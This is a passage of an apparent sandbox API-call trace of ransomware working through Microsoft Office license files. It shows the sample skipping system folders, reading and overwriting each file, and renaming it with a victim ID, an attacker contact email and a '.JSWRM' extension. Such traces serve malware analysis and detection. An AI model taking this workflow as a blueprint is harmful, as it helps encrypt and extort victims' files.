RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0107.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0107.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0107.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0107.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0107.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0107.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.010] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11607) returned 1 [0107.010] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.010] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.012] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.013] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.013] CloseHandle (hObject=0x45c) returned 1 [0107.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0107.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0107.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0107.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0107.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0107.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.014] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe85e6080, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe85e6080, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe871735d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PO6886~1.XRM")) returned 1 [0107.014] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.014] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.014] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.014] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.014] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.015] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.015] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.015] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.015] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.015] lstrcmpiW (lpString1="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0107.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0107.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0107.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0107.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0107.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.016] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19952) returned 1 [0107.016] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0107.016] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0107.018] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.018] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0107.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.019] CloseHandle (hObject=0x45c) returned 1 [0107.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0107.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0107.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0107.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.019] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0107.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.020] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe85bfe34, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe85bfe34, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8789aa5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Retail-pl.xrm-ms", cAlternateFileName="POC1A0~1.XRM")) returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.020] lstrcmpiW (lpString1="PowerPointR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0107.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0107.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0107.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0107.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0107.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241178, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0107.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0107.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.021] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0107.021] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0107.021] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0107.025] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.025] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0107.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.025] CloseHandle (hObject=0x45c) returned 1 [0107.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0107.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0107.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0107.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0107.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0107.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0107.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0107.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0107.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0107.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0107.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0107.027] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84db012, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe84db012, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8599bc6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Retail-ppd.xrm-ms", cAlternateFileName="POWERP~3.XRM")) returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", 